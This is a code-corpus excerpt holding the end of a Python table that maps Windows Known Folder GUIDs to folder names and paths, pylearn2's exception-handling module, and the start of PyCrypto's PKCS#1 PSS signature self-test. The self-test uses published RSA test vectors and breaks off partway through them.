u'767e6811-49cb-4273-87c2-20f355e1085b': u'One Drive Camera Roll',
u'76fc4e2d-d6ad-4519-a663-37bd56068185': u'Printers',
u'7b0db17d-9cd2-4a93-9733-46cc89022e7c': u'Documents',
u'7b396e54-9ec5-4300-be0a-2482ebae1a26': u'Default Gadgets (Sidebar Default Parts)',
u'7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e': u'Program Files (x86)',
u'7d1d3a04-debb-4115-95cf-2f29da2920da': u'Saved Searches (Searches)',
u'7e636bfe-dfa9-4d5e-b456-d7b39851d8a9': u'Templates',
u'82a5ea35-d9cd-47c5-9629-e15d2f714e6e': u'(Common) Startup',
u'82a74aeb-aeb4-465c-a014-d097ee346d63': u'Control Panel',
u'859ead94-2e85-48ad-a71a-0969cb56a6cd': u'Sample Videos',
u'8983036c-27c0-404b-8f08-102d10dcfd74': u'Send To',
u'8ad10c31-2adb-4296-a8f7-e4701232c972': u'Resources (Resources Directory)',
u'905e63b6-c1bf-494e-b29c-65b732d3d21a': u'Program Files',
u'9274bd8d-cfd1-41c3-b35e-b13f55a758f4': u'Printer Shortcuts (PrintHood)',
u'98ec0e18-2098-4d44-8644-66979315a281': u'Microsoft Office Outlook (MAPI)',
u'9b74b6a3-0dfd-4f11-9e78-5f7800f2e772': u'User\'s name',
u'9e3995ab-1f9c-4f13-b827-48b24b6c7174': u'User Pinned',
u'9e52ab10-f80d-49df-acb8-4330f5687855': u'Temporary Burn Folder (CD Burning)',
u'a302545d-deff-464b-abe8-61c8648d939b': u'Libraries',
u'a305ce99-f527-492b-8b1a-7e76fa98d6e4': u'Installed Updates (Application Updates)',
u'a3918781-e5f2-4890-b3d9-a7e54332328c': u'Application Shortcuts',
u'a4115719-d62e-491d-aa7c-e74b8be3b067': u'(Common) Start Menu',
u'a520a1a4-1780-4ff6-bd18-167343c5af16': u'Local Application Data Low (Local Low)',
u'a52bba46-e9e1-435f-b3d9-28daa648c0f6': u'One Drive',
u'a63293e8-664e-48db-a079-df759e0509f7': u'Templates',
u'a75d362e-50fc-4fb7-ac2c-a8beaa314493': u'Gadgets (Sidebar Parts)',
u'a77f5d77-2e2b-44c3-a6a2-aba601054a51': u'Programs',
u'a990ae9f-a03b-4e80-94bc-9912d7504104': u'Pictures',
u'aaa8d5a5-f1d6-4259-baa8-78e7ef60835e': u'Roamed Tile Images',
u'ab5fb87b-7ce2-4f83-915d-550846c9537b': u'Camera Roll',
u'ae50c081-ebd2-438a-8655-8a092e34987a': u'Recent (Recent Items)',
u'b250c668-f57d-4ee1-a63c-290ee7d1aa1f': u'Sample Music',
u'b4bfcc3a-db2c-424c-b029-7fe99a87c641': u'Desktop',
u'b6ebfb86-6907-413c-9af7-4fc2abf07cc5': u'Public Pictures (Common Pictures)',
u'b7534046-3ecb-4c18-be4e-64cd4cb7d6ac': u'Recycle Bin (Bit Bucket)',
u'b7bede81-df94-4682-a7d8-57a52620b86f': u'Screenshots',
u'b94237e7-57ac-4347-9151-b08c6c32d1f7': u'(Common) Templates',
u'b97d20bb-f46a-4c97-ba10-5e3608430854': u'Startup',
u'bcb5256f-79f6-4cee-b725-dc34e402fd46': u'Implicit Application Shortcuts',
u'bcbd3057-ca5c-4622-b42d-bc56db0ae516': u'Programs',
u'bd85e001-112e-431e-983b-7b15ac09fff1': u'Recorded TV',
u'bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968': u'Links',
u'c1bae2d0-10df-4334-bedd-7aa20b227a9d': u'(Common) OEM Links',
u'c4900540-2379-4c75-844b-64e6faf8716b': u'Sample Pictures',
u'c4aa340d-f20f-4863-afef-f87ef2e6ba25': u'Public Desktop (Common Desktop)',
u'c5abbf53-e17f-4121-8900-86626fc2c973': u'Network Shortcuts (NetHood)',
u'c870044b-f49e-4126-a9c3-b52a1ff411e8': u'Ringtones',
u'cac52c1a-b53d-4edc-92d7-6b2e8ac19434': u'Games',
u'd0384e7d-bac3-4797-8f14-cba229b392b5': u'(Common) Administrative Tools',
u'd20beec4-5ca8-4905-ae3b-bf251ea09b53': u'Network (Places)',
u'd65231b0-b2f1-4857-a4ce-a8e7c6ea7d27': u'System32 (x86)',
u'd9dc8a3b-b784-432e-a781-5a1130a75963': u'History',
u'de61d971-5ebc-4f02-a3a9-6c82895e5c04': u'Add New Programs (Get Programs)',
u'de92c1c7-837f-4f69-a3bb-86e631204a23': u'Playlists',
u'de974d24-d9c6-4d3e-bf91-f4455120b917': u'Common Files (x86)',
u'debf2536-e1a8-4c59-b6a2-414586476aea': u'Game Explorer (Public Game Tasks)',
u'df7266ac-9274-4867-8d55-3bd661de872d': u'Programs and Features (Change and Remove Programs)',
u'dfdf76a2-c82a-4d63-906a-5644ac457385': u'Public',
u'e555ab60-153b-4d17-9f04-a5fe99fc15ec': u'Ringtones',
u'ed4824af-dce4-45a8-81e2-fc7965083634': u'Public Documents (Common Documents)',
u'ee32e446-31ca-4aba-814f-a5ebd2fd6d5e': u'Offline Files (CSC)',
u'f1b32785-6fba-4fcf-9d55-7b8e7f157091': u'Local Application Data',
u'f38bf404-1d43-42f2-9305-67de0b28fc23': u'Windows',
u'f3ce0f7c-4901-4acc-8648-d5d44b04ef8f': u'User\'s Files',
u'f7f1ed05-9f6d-47a2-aaae-29d317c6f066': u'Common Files',
u'fd228cb7-ae11-4ae3-864c-16f3910ab8fe': u'Fonts',
u'fdd39ad0-238f-46af-adb4-6c85480369c7': u'Documents (Personal)',
}
PATHS = {
u'008ca0b1-55b4-4c56-b8a8-4de4b299d3be': u'%APPDATA%\\Microsoft\\Windows\\AccountPictures',
u'00bcfc5a-ed94-4e48-96a1-3f6217f21990': u'%LOCALAPPDATA%\\Microsoft\\Windows\\RoamingTiles',
u'0139d44e-6afe-49f2-8690-3dafcae6ffb8': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs',
u'0482af6c-08f1-4c34-8c90-e17ec98b1e17': u'%PUBLIC%\\AccountPictures',
u'054fae61-4dd8-4787-80b6-090220c4b700': u'%LOCALAPPDATA%\\Microsoft\\Windows\\GameExplorer',
u'0762d272-c50a-4bb0-a382-697dcd729b80': u'%SYSTEMDRIVE%\\Users',
u'0ac0837c-bbf8-452a-850d-79d08e667ca7': u'',
u'0d4c3db6-03a3-462f-a0e6-08924c41b5d4': u'%LOCALAPPDATA%\\Microsoft\\Windows\\ConnectedSearch\\History',
u'0f214138-b1d3-4a90-bba9-27cbc0c5389a': u'',
u'15ca69b3-30ee-49c1-ace1-6b5ec372afb5': u'%PUBLIC%\\Music\\Sample Playlists',
u'1777f761-68ad-4d8a-87bd-30b759fa33dd': u'%USERPROFILE%\\Favorites',
u'18989b1d-99b5-455b-841c-ab7c74e4ddfc': u'%USERPROFILE%\\Videos',
u'190337d1-b8ca-4121-a639-6d472d16972a': u'',
u'1a6fdba2-f42d-4358-a798-b74d745926c5': u'%PUBLIC%\\RecordedTV.library-ms',
u'1ac14e77-02e7-4e5d-b744-2eb1ae5198b7': u'%WINDIR%\\System32',
u'1b3ea5dc-b587-4786-b4ef-bd1dc332aeae': u'%APPDATA%\\Microsoft\\Windows\\Libraries',
u'1e87508d-89c2-42f0-8a7e-645a0f50ca58': u'',
u'2112ab0a-c86a-4ffe-a368-0de96e47012e': u'%APPDATA%\\Microsoft\\Windows\\Libraries\\Music.library-ms',
u'2400183a-6185-49fb-a2d8-4a392a602ba3': u'%PUBLIC%\\Videos',
u'24d89e24-2f19-4534-9dde-6a6671fbb8fe': u'%USERPROFILE%\\OneDrive\\Documents',
u'289a9a43-be44-4057-a41b-587a76d7e7f9': u'',
u'2a00375e-224c-49de-b8d1-440df7ef3ddc': u'%WINDIR%\\resources\\%CODEPAGE%',
u'2b0f765d-c0e9-4171-908e-08a611b84ff6': u'%APPDATA%\\Microsoft\\Windows\\Cookies',
u'2c36c0aa-5812-4b87-bfd0-4cd0dfb19b39': u'%LOCALAPPDATA%\\Microsoft\\Windows Photo Gallery\\Original Images',
u'3214fab5-9757-4298-bb61-92a9deaa44ff': u'%PUBLIC%\\Music',
u'339719b5-8c47-4894-94c2-d8f77add44a6': u'%USERPROFILE%\\OneDrive\\Pictures',
u'33e28130-4e1e-4676-835a-98395c3bc3bb': u'%USERPROFILE%\\Pictures',
u'352481e8-33be-4251-ba85-6007caedcf9d': u'%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files',
u'374de290-123f-4565-9164-39c4925e467b': u'%USERPROFILE%\\Downloads',
u'3d644c9b-1fb8-4f30-9b45-f670235f79c0': u'%PUBLIC%\\Downloads',
u'3eb685db-65f9-4cf6-a03a-e3ef65729f3d': u'%USERPROFILE%\\AppData\\Roaming',
u'43668bf8-c14e-49b2-97c9-747784d784b7': u'',
u'48daf80b-e6cf-4f4e-b800-0e69d84ee384': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Libraries',
u'491e922f-5643-4af4-a7eb-4e7a138d8174': u'%APPDATA%\\Microsoft\\Windows\\Libraries\\Videos.library-ms',
u'4bd8d571-6d19-48d3-be97-422220080e43': u'%USERPROFILE%\\Music',
u'4bfefb45-347d-4006-a5be-ac0cb0567192': u'',
u'4c5c32ff-bb9d-43b0-b5b4-2d72e54eaaa4': u'%USERPROFILE%\\Saved Games',
u'4d9f7874-4e0c-4904-967b-40b0d20c3e4b': u'',
u'52528a6b-b9e3-4add-b60d-588c2dba842d': u'',
u'52a4f021-7b75-48a9-9f6b-4b87a210bc8f': u'%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch',
u'56784854-c6cb-462b-8169-88e350acb882': u'',
u'5b3749ad-b49f-49c1-83eb-15370fbd4882': u'',
u'5cd7aee2-2219-4a67-b85d-6c9ce15660cb': u'%LOCALAPPDATA%\\Programs',
u'5ce4a5e9-e4eb-479d-b89f-130c02886155': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\DeviceMetadataStore',
u'5e6c858f-0e22-4760-9afe-ea3317b67173': u'%SYSTEMDRIVE%\\Users\\%USERNAME%',
u'625b53c3-ab48-4ec1-ba1f-a1ef4146fc19': u'%APPDATA%\\Microsoft\\Windows\\Start Menu',
u'62ab5d82-fdc1-4dc3-a9dd-070d1d495d97': u'%SYSTEMDRIVE%\\ProgramData',
u'6365d5a7-0f0d-45e5-87f6-0da56b6a4f7d': u'%PROGRAMFILES%\\Common Files',
u'69d2cf90-fc33-4fb7-9a0c-ebb0f0fcb43c': u'%USERPROFILE%\\Pictures\\Slide Shows',
u'6d809377-6af0-444b-8957-a3773f02200e': u'%SYSTEMDRIVE%\\Program Files',
u'6f0cd92b-2e97-45d1-88ff-b0d186b8dedd': u'',
u'724ef170-a42d-4fef-9f26-b60e846fba4f': u'%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools',
u'767e6811-49cb-4273-87c2-20f355e1085b': u'%USERPROFILE%\\OneDrive\\Pictures\\Camera Roll',
u'76fc4e2d-d6ad-4519-a663-37bd56068185': u'',
u'7b0db17d-9cd2-4a93-9733-46cc89022e7c': u'%APPDATA%\\Microsoft\\Windows\\Libraries\\Documents.library-ms',
u'7b396e54-9ec5-4300-be0a-2482ebae1a26': u'%PROGRAMFILES%\\Windows Sidebar\\Gadgets',
u'7c5a40ef-a0fb-4bfc-874a-c0f2e0b9fa8e': u'%PROGRAMFILES% (%SYSTEMDRIVE%\\Program Files)',
u'7d1d3a04-debb-4115-95cf-2f29da2920da': u'%USERPROFILE%\\Searches',
u'7e636bfe-dfa9-4d5e-b456-d7b39851d8a9': u'%LOCALAPPDATA%\\Microsoft\\Windows\\ConnectedSearch\\Templates',
u'82a5ea35-d9cd-47c5-9629-e15d2f714e6e': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp',
u'82a74aeb-aeb4-465c-a014-d097ee346d63': u'',
u'859ead94-2e85-48ad-a71a-0969cb56a6cd': u'%PUBLIC%\\Videos\\Sample Videos',
u'8983036c-27c0-404b-8f08-102d10dcfd74': u'%APPDATA%\\Microsoft\\Windows\\SendTo',
u'8ad10c31-2adb-4296-a8f7-e4701232c972': u'%WINDIR%\\Resources',
u'905e63b6-c1bf-494e-b29c-65b732d3d21a': u'%SYSTEMDRIVE%\\Program Files',
u'9274bd8d-cfd1-41c3-b35e-b13f55a758f4': u'%APPDATA%\\Microsoft\\Windows\\Printer Shortcuts',
u'98ec0e18-2098-4d44-8644-66979315a281': u'',
u'9b74b6a3-0dfd-4f11-9e78-5f7800f2e772': u'',
u'9e3995ab-1f9c-4f13-b827-48b24b6c7174': u'%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned',
u'9e52ab10-f80d-49df-acb8-4330f5687855': u'%LOCALAPPDATA%\\Microsoft\\Windows\\Burn\\Burn',
u'a302545d-deff-464b-abe8-61c8648d939b': u'',
u'a305ce99-f527-492b-8b1a-7e76fa98d6e4': u'',
u'a3918781-e5f2-4890-b3d9-a7e54332328c': u'%LOCALAPPDATA%\\Microsoft\\Windows\\Application Shortcuts',
u'a4115719-d62e-491d-aa7c-e74b8be3b067': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu',
u'a520a1a4-1780-4ff6-bd18-167343c5af16': u'%USERPROFILE%\\AppData\\LocalLow',
u'a52bba46-e9e1-435f-b3d9-28daa648c0f6': u'%USERPROFILE%\\OneDrive',
u'a63293e8-664e-48db-a079-df759e0509f7': u'%APPDATA%\\Microsoft\\Windows\\Templates',
u'a75d362e-50fc-4fb7-ac2c-a8beaa314493': u'%LOCALAPPDATA%\\Microsoft\\Windows Sidebar\\Gadgets',
u'a77f5d77-2e2b-44c3-a6a2-aba601054a51': u'%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs',
u'a990ae9f-a03b-4e80-94bc-9912d7504104': u'%APPDATA%\\Microsoft\\Windows\\Libraries\\Pictures.library-ms',
u'aaa8d5a5-f1d6-4259-baa8-78e7ef60835e': u'%LOCALAPPDATA%\\Microsoft\\Windows\\RoamedTileImages',
u'ab5fb87b-7ce2-4f83-915d-550846c9537b': u'%USERPROFILE%\\Pictures\\Camera Roll',
u'ae50c081-ebd2-438a-8655-8a092e34987a': u'%APPDATA%\\Microsoft\\Windows\\Recent',
u'b250c668-f57d-4ee1-a63c-290ee7d1aa1f': u'%PUBLIC%\\Music\\Sample Music',
u'b4bfcc3a-db2c-424c-b029-7fe99a87c641': u'%USERPROFILE%\\Desktop',
u'b6ebfb86-6907-413c-9af7-4fc2abf07cc5': u'%PUBLIC%\\Pictures',
u'b7534046-3ecb-4c18-be4e-64cd4cb7d6ac': u'',
u'b7bede81-df94-4682-a7d8-57a52620b86f': u'%USERPROFILE%\\Pictures\\Screenshots',
u'b94237e7-57ac-4347-9151-b08c6c32d1f7': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Templates',
u'b97d20bb-f46a-4c97-ba10-5e3608430854': u'%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp',
u'bcb5256f-79f6-4cee-b725-dc34e402fd46': u'%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts',
u'bcbd3057-ca5c-4622-b42d-bc56db0ae516': u'%LOCALAPPDATA%\\Programs\\Common',
u'bd85e001-112e-431e-983b-7b15ac09fff1': u'',
u'bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968': u'%USERPROFILE%\\Links',
u'c1bae2d0-10df-4334-bedd-7aa20b227a9d': u'%ALLUSERSPROFILE%\\OEM Links',
u'c4900540-2379-4c75-844b-64e6faf8716b': u'%PUBLIC%\\Pictures\\Sample Pictures',
u'c4aa340d-f20f-4863-afef-f87ef2e6ba25': u'%PUBLIC%\\Desktop',
u'c5abbf53-e17f-4121-8900-86626fc2c973': u'%APPDATA%\\Microsoft\\Windows\\Network Shortcuts',
u'c870044b-f49e-4126-a9c3-b52a1ff411e8': u'%LOCALAPPDATA%\\Microsoft\\Windows\\Ringtones',
u'cac52c1a-b53d-4edc-92d7-6b2e8ac19434': u'',
u'd0384e7d-bac3-4797-8f14-cba229b392b5': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Administrative Tools',
u'd20beec4-5ca8-4905-ae3b-bf251ea09b53': u'',
u'd65231b0-b2f1-4857-a4ce-a8e7c6ea7d27': u'%WINDIR%\\system32',
u'd9dc8a3b-b784-432e-a781-5a1130a75963': u'%LOCALAPPDATA%\\Microsoft\\Windows\\History',
u'de61d971-5ebc-4f02-a3a9-6c82895e5c04': u'',
u'de92c1c7-837f-4f69-a3bb-86e631204a23': u'%USERPROFILE%\\Music\\Playlists',
u'de974d24-d9c6-4d3e-bf91-f4455120b917': u'%PROGRAMFILES%\\Common Files',
u'debf2536-e1a8-4c59-b6a2-414586476aea': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\GameExplorer',
u'df7266ac-9274-4867-8d55-3bd661de872d': u'',
u'dfdf76a2-c82a-4d63-906a-5644ac457385': u'%SYSTEMDRIVE%\\Users\\Public',
u'e555ab60-153b-4d17-9f04-a5fe99fc15ec': u'%ALLUSERSPROFILE%\\Microsoft\\Windows\\Ringtones',
u'ed4824af-dce4-45a8-81e2-fc7965083634': u'%PUBLIC%\\Documents',
u'ee32e446-31ca-4aba-814f-a5ebd2fd6d5e': u'',
u'f1b32785-6fba-4fcf-9d55-7b8e7f157091': u'%USERPROFILE%\\AppData\\Local',
u'f38bf404-1d43-42f2-9305-67de0b28fc23': u'%WINDIR%',
u'f3ce0f7c-4901-4acc-8648-d5d44b04ef8f': u'',
u'f7f1ed05-9f6d-47a2-aaae-29d317c6f066': u'%PROGRAMFILES%\\Common Files',
u'fd228cb7-ae11-4ae3-864c-16f3910ab8fe': u'%WINDIR%\\Fonts',
u'fdd39ad0-238f-46af-adb4-6c85480369c7': u'%USERPROFILE%\\Documents',
}
| apache-2.0 |
w1kke/pylearn2 | pylearn2/utils/exc.py | 7 | 2984 | """Exceptions used by basic support utilities."""
__author__ = "Ian Goodfellow"
import inspect
import sys
import textwrap
from pylearn2.utils.common_strings import environment_variable_essay
from theano.compat import six
class EnvironmentVariableError(Exception):
"""
An exception raised when a required environment variable is not defined
"""
def __init__(self, *args):
super(EnvironmentVariableError, self).__init__(*args)
# This exception is here as string_utils need it and setting it in
# datasets.exc would create a circular import.
class NoDataPathError(EnvironmentVariableError):
"""
Exception raised when PYLEARN2_DATA_PATH is required but has not been
defined.
"""
def __init__(self):
"""
.. todo::
WRITEME
"""
super(NoDataPathError, self).__init__(data_path_essay +
environment_variable_essay)
data_path_essay = """\
You need to define your PYLEARN2_DATA_PATH environment variable. If you are
using a computer at LISA, this should be set to /data/lisa/data.
"""
def reraise_as(new_exc):
"""
Parameters
----------
new_exc : Exception isinstance
The new error to be raised e.g. (ValueError("New message"))
or a string that will be prepended to the original exception
message
Notes
-----
Note that when reraising exceptions, the arguments of the original
exception are cast to strings and appended to the error message. If
you want to retain the original exception arguments, please use:
>>> except Exception as e:
>>> reraise_as(NewException("Extra information", *e.args))
Examples
--------
>>> try:
>>> do_something_crazy()
>>> except Exception:
>>> reraise_as(UnhandledException("Informative message"))
"""
orig_exc_type, orig_exc_value, orig_exc_traceback = sys.exc_info()
if isinstance(new_exc, six.string_types):
new_exc = orig_exc_type(new_exc)
if hasattr(new_exc, 'args'):
if len(new_exc.args) > 0:
# We add all the arguments to the message, to make sure that this
# information isn't lost if this exception is reraised again
new_message = ', '.join(str(arg) for arg in new_exc.args)
else:
new_message = ""
new_message += '\n\nOriginal exception:\n\t' + orig_exc_type.__name__
if hasattr(orig_exc_value, 'args') and len(orig_exc_value.args) > 0:
if getattr(orig_exc_value, 'reraised', False):
new_message += ': ' + str(orig_exc_value.args[0])
else:
new_message += ': ' + ', '.join(str(arg)
for arg in orig_exc_value.args)
new_exc.args = (new_message,) + new_exc.args[1:]
new_exc.__cause__ = orig_exc_value
new_exc.reraised = True
six.reraise(type(new_exc), new_exc, orig_exc_traceback)
| bsd-3-clause |
kieferbonk/xbmc-finnish-tv | plugin.video.yleareena/osx/Crypto/SelfTest/Signature/test_pkcs1_pss.py | 113 | 20598 | # -*- coding: utf-8 -*-
#
# SelfTest/Signature/test_pkcs1_pss.py: Self-test for PKCS#1 PSS signatures
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
from __future__ import nested_scopes
__revision__ = "$Id$"
import unittest
from Crypto.PublicKey import RSA
from Crypto import Random
from Crypto.SelfTest.st_common import list_test_cases, a2b_hex, b2a_hex
from Crypto.Hash import *
from Crypto.Signature import PKCS1_PSS as PKCS
from Crypto.Util.py3compat import *
def isStr(s):
t = ''
try:
t += s
except TypeError:
return 0
return 1
def rws(t):
"""Remove white spaces, tabs, and new lines from a string"""
for c in ['\t', '\n', ' ']:
t = t.replace(c,'')
return t
def t2b(t):
"""Convert a text string with bytes in hex form to a byte string"""
clean = b(rws(t))
if len(clean)%2 == 1:
raise ValueError("Even number of characters expected")
return a2b_hex(clean)
# Helper class to count how many bytes have been requested
# from the key's private RNG, w/o counting those used for blinding
class MyKey:
def __init__(self, key):
self._key = key
self.n = key.n
self.asked = 0
def _randfunc(self, N):
self.asked += N
return self._key._randfunc(N)
def sign(self, m):
return self._key.sign(m)
def has_private(self):
return self._key.has_private()
def decrypt(self, m):
return self._key.decrypt(m)
def verify(self, m, p):
return self._key.verify(m, p)
def encrypt(self, m, p):
return self._key.encrypt(m, p)
class PKCS1_PSS_Tests(unittest.TestCase):
# List of tuples with test data for PKCS#1 PSS
# Each tuple is made up by:
# Item #0: dictionary with RSA key component, or key to import
# Item #1: data to hash and sign
# Item #2: signature of the data #1, done with the key #0,
# and salt #3 after hashing it with #4
# Item #3: salt
# Item #4: hash object generator
_testData = (
#
# From in pss-vect.txt to be found in
# ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
#
(
# Private key
{
'n':'''a2 ba 40 ee 07 e3 b2 bd 2f 02 ce 22 7f 36 a1 95
02 44 86 e4 9c 19 cb 41 bb bd fb ba 98 b2 2b 0e
57 7c 2e ea ff a2 0d 88 3a 76 e6 5e 39 4c 69 d4
b3 c0 5a 1e 8f ad da 27 ed b2 a4 2b c0 00 fe 88
8b 9b 32 c2 2d 15 ad d0 cd 76 b3 e7 93 6e 19 95
5b 22 0d d1 7d 4e a9 04 b1 ec 10 2b 2e 4d e7 75
12 22 aa 99 15 10 24 c7 cb 41 cc 5e a2 1d 00 ee
b4 1f 7c 80 08 34 d2 c6 e0 6b ce 3b ce 7e a9 a5''',
'e':'''01 00 01''',
# In the test vector, only p and q were given...
# d is computed offline as e^{-1} mod (p-1)(q-1)
'd':'''50e2c3e38d886110288dfc68a9533e7e12e27d2aa56
d2cdb3fb6efa990bcff29e1d2987fb711962860e7391b1ce01
ebadb9e812d2fbdfaf25df4ae26110a6d7a26f0b810f54875e
17dd5c9fb6d641761245b81e79f8c88f0e55a6dcd5f133abd3
5f8f4ec80adf1bf86277a582894cb6ebcd2162f1c7534f1f49
47b129151b71'''
},
# Data to sign
'''85 9e ef 2f d7 8a ca 00 30 8b dc 47 11 93 bf 55
bf 9d 78 db 8f 8a 67 2b 48 46 34 f3 c9 c2 6e 64
78 ae 10 26 0f e0 dd 8c 08 2e 53 a5 29 3a f2 17
3c d5 0c 6d 5d 35 4f eb f7 8b 26 02 1c 25 c0 27
12 e7 8c d4 69 4c 9f 46 97 77 e4 51 e7 f8 e9 e0
4c d3 73 9c 6b bf ed ae 48 7f b5 56 44 e9 ca 74
ff 77 a5 3c b7 29 80 2f 6e d4 a5 ff a8 ba 15 98
90 fc''',
# Signature
'''8d aa 62 7d 3d e7 59 5d 63 05 6c 7e c6 59 e5 44
06 f1 06 10 12 8b aa e8 21 c8 b2 a0 f3 93 6d 54
dc 3b dc e4 66 89 f6 b7 95 1b b1 8e 84 05 42 76
97 18 d5 71 5d 21 0d 85 ef bb 59 61 92 03 2c 42
be 4c 29 97 2c 85 62 75 eb 6d 5a 45 f0 5f 51 87
6f c6 74 3d ed dd 28 ca ec 9b b3 0e a9 9e 02 c3
48 82 69 60 4f e4 97 f7 4c cd 7c 7f ca 16 71 89
71 23 cb d3 0d ef 5d 54 a2 b5 53 6a d9 0a 74 7e''',
# Salt
'''e3 b5 d5 d0 02 c1 bc e5 0c 2b 65 ef 88 a1 88 d8
3b ce 7e 61''',
# Hash algorithm
SHA
),
#
# Example 1.1 to be found in
# ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
#
(
# Private key
{
'n':'''a5 6e 4a 0e 70 10 17 58 9a 51 87 dc 7e a8 41 d1
56 f2 ec 0e 36 ad 52 a4 4d fe b1 e6 1f 7a d9 91
d8 c5 10 56 ff ed b1 62 b4 c0 f2 83 a1 2a 88 a3
94 df f5 26 ab 72 91 cb b3 07 ce ab fc e0 b1 df
d5 cd 95 08 09 6d 5b 2b 8b 6d f5 d6 71 ef 63 77
c0 92 1c b2 3c 27 0a 70 e2 59 8e 6f f8 9d 19 f1
05 ac c2 d3 f0 cb 35 f2 92 80 e1 38 6b 6f 64 c4
ef 22 e1 e1 f2 0d 0c e8 cf fb 22 49 bd 9a 21 37''',
'e':'''01 00 01''',
'd':'''33 a5 04 2a 90 b2 7d 4f 54 51 ca 9b bb d0 b4 47
71 a1 01 af 88 43 40 ae f9 88 5f 2a 4b be 92 e8
94 a7 24 ac 3c 56 8c 8f 97 85 3a d0 7c 02 66 c8
c6 a3 ca 09 29 f1 e8 f1 12 31 88 44 29 fc 4d 9a
e5 5f ee 89 6a 10 ce 70 7c 3e d7 e7 34 e4 47 27
a3 95 74 50 1a 53 26 83 10 9c 2a ba ca ba 28 3c
31 b4 bd 2f 53 c3 ee 37 e3 52 ce e3 4f 9e 50 3b
d8 0c 06 22 ad 79 c6 dc ee 88 35 47 c6 a3 b3 25'''
},
# Message
'''cd c8 7d a2 23 d7 86 df 3b 45 e0 bb bc 72 13 26
d1 ee 2a f8 06 cc 31 54 75 cc 6f 0d 9c 66 e1 b6
23 71 d4 5c e2 39 2e 1a c9 28 44 c3 10 10 2f 15
6a 0d 8d 52 c1 f4 c4 0b a3 aa 65 09 57 86 cb 76
97 57 a6 56 3b a9 58 fe d0 bc c9 84 e8 b5 17 a3
d5 f5 15 b2 3b 8a 41 e7 4a a8 67 69 3f 90 df b0
61 a6 e8 6d fa ae e6 44 72 c0 0e 5f 20 94 57 29
cb eb e7 7f 06 ce 78 e0 8f 40 98 fb a4 1f 9d 61
93 c0 31 7e 8b 60 d4 b6 08 4a cb 42 d2 9e 38 08
a3 bc 37 2d 85 e3 31 17 0f cb f7 cc 72 d0 b7 1c
29 66 48 b3 a4 d1 0f 41 62 95 d0 80 7a a6 25 ca
b2 74 4f d9 ea 8f d2 23 c4 25 37 02 98 28 bd 16
be 02 54 6f 13 0f d2 e3 3b 93 6d 26 76 e0 8a ed
1b 73 31 8b 75 0a 01 67 d0''',
# Signature
'''90 74 30 8f b5 98 e9 70 1b 22 94 38 8e 52 f9 71
fa ac 2b 60 a5 14 5a f1 85 df 52 87 b5 ed 28 87
e5 7c e7 fd 44 dc 86 34 e4 07 c8 e0 e4 36 0b c2
26 f3 ec 22 7f 9d 9e 54 63 8e 8d 31 f5 05 12 15
df 6e bb 9c 2f 95 79 aa 77 59 8a 38 f9 14 b5 b9
c1 bd 83 c4 e2 f9 f3 82 a0 d0 aa 35 42 ff ee 65
98 4a 60 1b c6 9e b2 8d eb 27 dc a1 2c 82 c2 d4
c3 f6 6c d5 00 f1 ff 2b 99 4d 8a 4e 30 cb b3 3c''',
# Salt
'''de e9 59 c7 e0 64 11 36 14 20 ff 80 18 5e d5 7f
3e 67 76 af''',
# Hash
SHA
),
#
# Example 1.2 to be found in
# ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1-vec.zip
#
(
# Private key
{
'n':'''a5 6e 4a 0e 70 10 17 58 9a 51 87 dc 7e a8 41 d1
56 f2 ec 0e 36 ad 52 a4 4d fe b1 e6 1f 7a d9 91
d8 c5 10 56 ff ed b1 62 b4 c0 f2 83 a1 2a 88 a3
94 df f5 26 ab 72 91 cb b3 07 ce ab fc e0 b1 df
d5 cd 95 08 09 6d 5b 2b 8b 6d f5 d6 71 ef 63 77
c0 92 1c b2 3c 27 0a 70 e2 59 8e 6f f8 9d 19 f1
05 ac c2 d3 f0 cb 35 f2 92 80 e1 38 6b 6f 64 c4
ef 22 e1 e1 f2 0d 0c e8 cf fb 22 49 bd 9a 21 37''',
'e':'''01 00 01''',
'd':'''33 a5 04 2a 90 b2 7d 4f 54 51 ca 9b bb d0 b4 47
71 a1 01 af 88 43 40 ae f9 88 5f 2a 4b be 92 e8
94 a7 24 ac 3c 56 8c 8f 97 85 3a d0 7c 02 66 c8
c6 a3 ca 09 29 f1 e8 f1 12 31 88 44 29 fc 4d 9a
